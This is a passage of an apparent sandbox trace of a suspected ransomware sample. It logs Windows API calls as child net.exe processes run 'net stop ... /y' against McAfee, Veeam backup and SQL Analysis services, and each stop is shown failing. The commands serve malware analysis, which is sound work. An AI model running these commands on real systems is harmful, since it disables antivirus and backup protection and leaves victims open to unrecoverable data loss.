_String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="stop", _String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="time", _String2="MSOLAP$TPSAMA") returned 7 [0200.013] _wcsicmp (_String1="user", _String2="MSOLAP$TPSAMA") returned 8 [0200.013] _wcsicmp (_String1="users", _String2="MSOLAP$TPSAMA") returned 8 [0200.013] _wcsicmp (_String1="msg", _String2="MSOLAP$TPSAMA") returned -8 [0200.013] _wcsicmp (_String1="messenger", _String2="MSOLAP$TPSAMA") returned -14 [0200.013] _wcsicmp (_String1="receiver", _String2="MSOLAP$TPSAMA") returned 5 [0200.013] _wcsicmp (_String1="rcv", _String2="MSOLAP$TPSAMA") returned 5 [0200.013] _wcsicmp (_String1="netpopup", _String2="MSOLAP$TPSAMA") returned 1 [0200.013] _wcsicmp (_String1="redirector", _String2="MSOLAP$TPSAMA") returned 5 [0200.013] _wcsicmp (_String1="redir", _String2="MSOLAP$TPSAMA") returned 5 [0200.013] _wcsicmp (_String1="rdr", _String2="MSOLAP$TPSAMA") returned 5 [0200.013] _wcsicmp (_String1="workstation", _String2="MSOLAP$TPSAMA") returned 10 [0200.013] _wcsicmp (_String1="work", _String2="MSOLAP$TPSAMA") returned 10 [0200.013] _wcsicmp (_String1="wksta", _String2="MSOLAP$TPSAMA") returned 10 [0200.013] _wcsicmp (_String1="prdr", _String2="MSOLAP$TPSAMA") returned 3 [0200.013] _wcsicmp (_String1="devrdr", _String2="MSOLAP$TPSAMA") returned -9 [0200.013] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$TPSAMA") returned -1 [0200.013] _wcsicmp (_String1="server", _String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="svr", _String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="srv", _String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$TPSAMA") returned -1 [0200.013] _wcsicmp (_String1="alerter", _String2="MSOLAP$TPSAMA") returned -12 [0200.013] _wcsicmp (_String1="netlogon", _String2="MSOLAP$TPSAMA") returned 1 [0200.013] _wcsupr (in: _String="MSOLAP$TPSAMA" | out: _String="MSOLAP$TPSAMA") returned="MSOLAP$TPSAMA" [0200.014] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3c54d0 [0200.016] GetServiceKeyNameW (in: hSCManager=0x3c54d0, lpDisplayName="MSOLAP$TPSAMA", lpServiceName=0xf1aaf0, lpcchBuffer=0x2cfe94 | out: lpServiceName="", lpcchBuffer=0x2cfe94) returned 0 [0200.016] _wcsicmp (_String1="msg", _String2="MSOLAP$TPSAMA") returned -8 [0200.016] _wcsicmp (_String1="messenger", _String2="MSOLAP$TPSAMA") returned -14 [0200.016] _wcsicmp (_String1="receiver", _String2="MSOLAP$TPSAMA") returned 5 [0200.017] _wcsicmp (_String1="rcv", _String2="MSOLAP$TPSAMA") returned 5 [0200.017] _wcsicmp (_String1="redirector", _String2="MSOLAP$TPSAMA") returned 5 [0200.017] _wcsicmp (_String1="redir", _String2="MSOLAP$TPSAMA") returned 5 [0200.017] _wcsicmp (_String1="rdr", _String2="MSOLAP$TPSAMA") returned 5 [0200.017] _wcsicmp (_String1="workstation", _String2="MSOLAP$TPSAMA") returned 10 [0200.017] _wcsicmp (_String1="work", _String2="MSOLAP$TPSAMA") returned 10 [0200.017] _wcsicmp (_String1="wksta", _String2="MSOLAP$TPSAMA") returned 10 [0200.017] _wcsicmp (_String1="prdr", _String2="MSOLAP$TPSAMA") returned 3 [0200.017] _wcsicmp (_String1="devrdr", _String2="MSOLAP$TPSAMA") returned -9 [0200.017] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$TPSAMA") returned -1 [0200.017] _wcsicmp (_String1="server", _String2="MSOLAP$TPSAMA") returned 6 [0200.017] _wcsicmp (_String1="svr", _String2="MSOLAP$TPSAMA") returned 6 [0200.017] _wcsicmp (_String1="srv", _String2="MSOLAP$TPSAMA") returned 6 [0200.017] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$TPSAMA") returned -1 [0200.017] _wcsicmp (_String1="alerter", _String2="MSOLAP$TPSAMA") returned -12 [0200.017] _wcsicmp (_String1="netlogon", _String2="MSOLAP$TPSAMA") returned 1 [0200.017] NetServiceControl (in: servername=0x0, service="MSOLAP$TPSAMA", opcode=0x0, arg=0x0, bufptr=0x2cfe90 | out: bufptr=0x2cfe90) returned 0x889 [0200.018] wcscpy_s (in: _Destination=0xf1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0200.018] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0200.018] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xf1b338, nSize=0x800, Arguments=0xf19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0200.020] GetFileType (hFile=0x26c) returned 0x3 [0200.020] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3c4000 [0200.020] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3c4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0200.020] WriteFile (in: hFile=0x26c, lpBuffer=0x3c4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2cfdd0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfdd0, lpOverlapped=0x0) returned 0 [0200.020] LocalFree (hMem=0x3c4000) returned 0x0 [0200.020] GetFileType (hFile=0x26c) returned 0x3 [0200.020] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c62a8 [0200.020] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3c62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n<", lpUsedDefaultChar=0x0) returned 2 [0200.020] WriteFile (in: hFile=0x26c, lpBuffer=0x3c62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfdd0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfdd0, lpOverlapped=0x0) returned 0 [0200.020] LocalFree (hMem=0x3c62a8) returned 0x0 [0200.020] _ultow (in: _Dest=0x889, _Radix=2948608 | out: _Dest=0x889) returned="2185" [0200.020] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xf1b338, nSize=0x800, Arguments=0xf19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0200.020] GetFileType (hFile=0x26c) returned 0x3 [0200.020] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3c62a8 [0200.020] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3c62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0200.020] WriteFile (in: hFile=0x26c, lpBuffer=0x3c62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2cfddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfddc, lpOverlapped=0x0) returned 0 [0200.020] LocalFree (hMem=0x3c62a8) returned 0x0 [0200.020] GetFileType (hFile=0x26c) returned 0x3 [0200.020] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c62a8 [0200.020] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3c62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n<", lpUsedDefaultChar=0x0) returned 2 [0200.020] WriteFile (in: hFile=0x26c, lpBuffer=0x3c62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfddc, lpOverlapped=0x0) returned 0 [0200.020] LocalFree (hMem=0x3c62a8) returned 0x0 [0200.021] NetApiBufferFree (Buffer=0x3c1c70) returned 0x0 [0200.021] NetApiBufferFree (Buffer=0x3c1c88) returned 0x0 [0200.021] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$TPSAMA /y" [0200.021] exit (_Code=2) Process: id = "164" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5225e000" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop McAfeeEngineService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 337 os_tid = 0x664 Process: id = "165" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x58c3f000" os_pid = "0x12c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "164" os_parent_pid = "0xac8" cmd_line = "C:\\Windows\\system32\\net1 stop McAfeeEngineService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 338 os_tid = 0x390 [0200.159] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33fcbc | out: lpSystemTimeAsFileTime=0x33fcbc*(dwLowDateTime=0x407e5360, dwHighDateTime=0x1d57a87)) [0200.159] GetCurrentProcessId () returned 0x12c [0200.159] GetCurrentThreadId () returned 0x390 [0200.159] GetTickCount () returned 0x116baf6 [0200.159] QueryPerformanceCounter (in: lpPerformanceCount=0x33fcb4 | out: lpPerformanceCount=0x33fcb4*=32044335333) returned 1 [0200.159] GetModuleHandleA (lpModuleName=0x0) returned 0xfe0000 [0200.159] __set_app_type (_Type=0x1) [0200.159] __p__fmode () returned 0x74eb31f4 [0200.159] __p__commode () returned 0x74eb31fc [0200.159] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfeffe6) returned 0x0 [0200.159] __getmainargs (in: _Argc=0xff9064, _Argv=0xff906c, _Env=0xff9068, _DoWildCard=0, _StartInfo=0xff9024 | out: _Argc=0xff9064, _Argv=0xff906c, _Env=0xff9068) returned 0 [0200.159] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0200.159] GetConsoleOutputCP () returned 0x1b5 [0200.160] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff9080 | out: lpCPInfo=0xff9080) returned 1 [0200.160] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.163] sprintf_s (in: _DstBuf=0x33fc74, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0200.163] setlocale (category=0, locale=".437") returned="English_United States.437" [0200.165] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0200.165] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0200.165] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeEngineService /y" [0200.165] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33fa40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0200.165] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x7a) returned 0x6f3c20 [0200.165] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0200.165] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33fc44 | out: Buffer=0x33fc44*=0x6f1c80) returned 0x0 [0200.165] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33fc44 | out: Buffer=0x33fc44*=0x6f1c98) returned 0x0 [0200.165] _fileno (_File=0x74eb2900) returned -2 [0200.165] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0200.165] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0200.165] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0200.165] _wcsicmp (_String1="config", _String2="stop") returned -16 [0200.165] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0200.166] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0200.166] _wcsicmp (_String1="file", _String2="stop") returned -13 [0200.166] _wcsicmp (_String1="files", _String2="stop") returned -13 [0200.166] _wcsicmp (_String1="group", _String2="stop") returned -12 [0200.166] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0200.166] _wcsicmp (_String1="help", _String2="stop") returned -11 [0200.166] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0200.166] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0200.166] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0200.166] _wcsicmp (_String1="session", _String2="stop") returned -15 [0200.166] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0200.166] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0200.166] _wcsicmp (_String1="share", _String2="stop") returned -12 [0200.166] _wcsicmp (_String1="start", _String2="stop") returned -14 [0200.166] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0200.166] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0200.166] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0200.166] _wcsicmp (_String1="accounts", _String2="McAfeeEngineService") returned -12 [0200.166] _wcsicmp (_String1="computer", _String2="McAfeeEngineService") returned -10 [0200.166] _wcsicmp (_String1="config", _String2="McAfeeEngineService") returned -10 [0200.166] _wcsicmp (_String1="continue", _String2="McAfeeEngineService") returned -10 [0200.166] _wcsicmp (_String1="cont", _String2="McAfeeEngineService") returned -10 [0200.166] _wcsicmp (_String1="file", _String2="McAfeeEngineService") returned -7 [0200.166] _wcsicmp (_String1="files", _String2="McAfeeEngineService") returned -7 [0200.166] _wcsicmp (_String1="group", _String2="McAfeeEngineService") returned -6 [0200.166] _wcsicmp (_String1="groups", _String2="McAfeeEngineService") returned -6 [0200.166] _wcsicmp (_String1="help", _String2="McAfeeEngineService") returned -5 [0200.166] _wcsicmp (_String1="helpmsg", _String2="McAfeeEngineService") returned -5 [0200.166] _wcsicmp (_String1="localgroup", _String2="McAfeeEngineService") returned -1 [0200.166] _wcsicmp (_String1="pause", _String2="McAfeeEngineService") returned 3 [0200.166] _wcsicmp (_String1="session", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="sessions", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="sess", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="share", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="start", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="stats", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="statistics", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="stop", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="time", _String2="McAfeeEngineService") returned 7 [0200.167] _wcsicmp (_String1="user", _String2="McAfeeEngineService") returned 8 [0200.167] _wcsicmp (_String1="users", _String2="McAfeeEngineService") returned 8 [0200.167] _wcsicmp (_String1="msg", _String2="McAfeeEngineService") returned 16 [0200.167] _wcsicmp (_String1="messenger", _String2="McAfeeEngineService") returned 2 [0200.167] _wcsicmp (_String1="receiver", _String2="McAfeeEngineService") returned 5 [0200.167] _wcsicmp (_String1="rcv", _String2="McAfeeEngineService") returned 5 [0200.167] _wcsicmp (_String1="netpopup", _String2="McAfeeEngineService") returned 1 [0200.167] _wcsicmp (_String1="redirector", _String2="McAfeeEngineService") returned 5 [0200.167] _wcsicmp (_String1="redir", _String2="McAfeeEngineService") returned 5 [0200.167] _wcsicmp (_String1="rdr", _String2="McAfeeEngineService") returned 5 [0200.167] _wcsicmp (_String1="workstation", _String2="McAfeeEngineService") returned 10 [0200.167] _wcsicmp (_String1="work", _String2="McAfeeEngineService") returned 10 [0200.167] _wcsicmp (_String1="wksta", _String2="McAfeeEngineService") returned 10 [0200.167] _wcsicmp (_String1="prdr", _String2="McAfeeEngineService") returned 3 [0200.167] _wcsicmp (_String1="devrdr", _String2="McAfeeEngineService") returned -9 [0200.167] _wcsicmp (_String1="lanmanworkstation", _String2="McAfeeEngineService") returned -1 [0200.167] _wcsicmp (_String1="server", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="svr", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="srv", _String2="McAfeeEngineService") returned 6 [0200.167] _wcsicmp (_String1="lanmanserver", _String2="McAfeeEngineService") returned -1 [0200.167] _wcsicmp (_String1="alerter", _String2="McAfeeEngineService") returned -12 [0200.167] _wcsicmp (_String1="netlogon", _String2="McAfeeEngineService") returned 1 [0200.167] _wcsupr (in: _String="McAfeeEngineService" | out: _String="MCAFEEENGINESERVICE") returned="MCAFEEENGINESERVICE" [0200.168] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6f54f0 [0200.170] GetServiceKeyNameW (in: hSCManager=0x6f54f0, lpDisplayName="MCAFEEENGINESERVICE", lpServiceName=0xffaaf0, lpcchBuffer=0x33fbe0 | out: lpServiceName="", lpcchBuffer=0x33fbe0) returned 0 [0200.171] _wcsicmp (_String1="msg", _String2="MCAFEEENGINESERVICE") returned 16 [0200.171] _wcsicmp (_String1="messenger", _String2="MCAFEEENGINESERVICE") returned 2 [0200.171] _wcsicmp (_String1="receiver", _String2="MCAFEEENGINESERVICE") returned 5 [0200.171] _wcsicmp (_String1="rcv", _String2="MCAFEEENGINESERVICE") returned 5 [0200.171] _wcsicmp (_String1="redirector", _String2="MCAFEEENGINESERVICE") returned 5 [0200.171] _wcsicmp (_String1="redir", _String2="MCAFEEENGINESERVICE") returned 5 [0200.171] _wcsicmp (_String1="rdr", _String2="MCAFEEENGINESERVICE") returned 5 [0200.171] _wcsicmp (_String1="workstation", _String2="MCAFEEENGINESERVICE") returned 10 [0200.171] _wcsicmp (_String1="work", _String2="MCAFEEENGINESERVICE") returned 10 [0200.171] _wcsicmp (_String1="wksta", _String2="MCAFEEENGINESERVICE") returned 10 [0200.171] _wcsicmp (_String1="prdr", _String2="MCAFEEENGINESERVICE") returned 3 [0200.171] _wcsicmp (_String1="devrdr", _String2="MCAFEEENGINESERVICE") returned -9 [0200.171] _wcsicmp (_String1="lanmanworkstation", _String2="MCAFEEENGINESERVICE") returned -1 [0200.171] _wcsicmp (_String1="server", _String2="MCAFEEENGINESERVICE") returned 6 [0200.171] _wcsicmp (_String1="svr", _String2="MCAFEEENGINESERVICE") returned 6 [0200.171] _wcsicmp (_String1="srv", _String2="MCAFEEENGINESERVICE") returned 6 [0200.171] _wcsicmp (_String1="lanmanserver", _String2="MCAFEEENGINESERVICE") returned -1 [0200.171] _wcsicmp (_String1="alerter", _String2="MCAFEEENGINESERVICE") returned -12 [0200.171] _wcsicmp (_String1="netlogon", _String2="MCAFEEENGINESERVICE") returned 1 [0200.171] NetServiceControl (in: servername=0x0, service="MCAFEEENGINESERVICE", opcode=0x0, arg=0x0, bufptr=0x33fbdc | out: bufptr=0x33fbdc) returned 0x889 [0200.172] wcscpy_s (in: _Destination=0xffa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0200.172] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0200.172] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb338, nSize=0x800, Arguments=0xff9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0200.174] GetFileType (hFile=0x26c) returned 0x3 [0200.174] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6f4020 [0200.174] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6f4020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nn", lpUsedDefaultChar=0x0) returned 30 [0200.174] WriteFile (in: hFile=0x26c, lpBuffer=0x6f4020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x33fb1c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fb1c, lpOverlapped=0x0) returned 0 [0200.174] LocalFree (hMem=0x6f4020) returned 0x0 [0200.174] GetFileType (hFile=0x26c) returned 0x3 [0200.174] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6f62c8 [0200.174] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6f62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\no", lpUsedDefaultChar=0x0) returned 2 [0200.174] WriteFile (in: hFile=0x26c, lpBuffer=0x6f62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33fb1c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fb1c, lpOverlapped=0x0) returned 0 [0200.174] LocalFree (hMem=0x6f62c8) returned 0x0 [0200.174] _ultow (in: _Dest=0x889, _Radix=3406668 | out: _Dest=0x889) returned="2185" [0200.174] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb338, nSize=0x800, Arguments=0xff9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0200.174] GetFileType (hFile=0x26c) returned 0x3 [0200.174] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6f62c8 [0200.174] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6f62c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0200.174] WriteFile (in: hFile=0x26c, lpBuffer=0x6f62c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x33fb28, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fb28, lpOverlapped=0x0) returned 0 [0200.174] LocalFree (hMem=0x6f62c8) returned 0x0 [0200.174] GetFileType (hFile=0x26c) returned 0x3 [0200.174] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6f62c8 [0200.174] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6f62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\no", lpUsedDefaultChar=0x0) returned 2 [0200.174] WriteFile (in: hFile=0x26c, lpBuffer=0x6f62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33fb28, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fb28, lpOverlapped=0x0) returned 0 [0200.174] LocalFree (hMem=0x6f62c8) returned 0x0 [0200.175] NetApiBufferFree (Buffer=0x6f1c80) returned 0x0 [0200.175] NetApiBufferFree (Buffer=0x6f1c98) returned 0x0 [0200.175] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeEngineService /y" [0200.175] exit (_Code=2) Process: id = "166" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x58363000" os_pid = "0xb0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 339 os_tid = 0x720 Process: id = "167" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6c873000" os_pid = "0x764" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "166" os_parent_pid = "0xb0c" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 340 os_tid = 0x6e8 [0200.315] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ff8fc | out: lpSystemTimeAsFileTime=0x2ff8fc*(dwLowDateTime=0x40962120, dwHighDateTime=0x1d57a87)) [0200.315] GetCurrentProcessId () returned 0x764 [0200.315] GetCurrentThreadId () returned 0x6e8 [0200.315] GetTickCount () returned 0x116bb92 [0200.315] QueryPerformanceCounter (in: lpPerformanceCount=0x2ff8f4 | out: lpPerformanceCount=0x2ff8f4*=32059938540) returned 1 [0200.315] GetModuleHandleA (lpModuleName=0x0) returned 0x560000 [0200.315] __set_app_type (_Type=0x1) [0200.315] __p__fmode () returned 0x74eb31f4 [0200.315] __p__commode () returned 0x74eb31fc [0200.315] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x56ffe6) returned 0x0 [0200.315] __getmainargs (in: _Argc=0x579064, _Argv=0x57906c, _Env=0x579068, _DoWildCard=0, _StartInfo=0x579024 | out: _Argc=0x579064, _Argv=0x57906c, _Env=0x579068) returned 0 [0200.316] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0200.316] GetConsoleOutputCP () returned 0x1b5 [0200.316] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x579080 | out: lpCPInfo=0x579080) returned 1 [0200.316] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.319] sprintf_s (in: _DstBuf=0x2ff8b4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0200.319] setlocale (category=0, locale=".437") returned="English_United States.437" [0200.321] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0200.321] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0200.321] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥ /y" [0200.321] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ff680, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0200.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb2) returned 0x783c58 [0200.321] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0200.321] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff884 | out: Buffer=0x2ff884*=0x781cb8) returned 0x0 [0200.321] NetApiBufferAllocate (in: 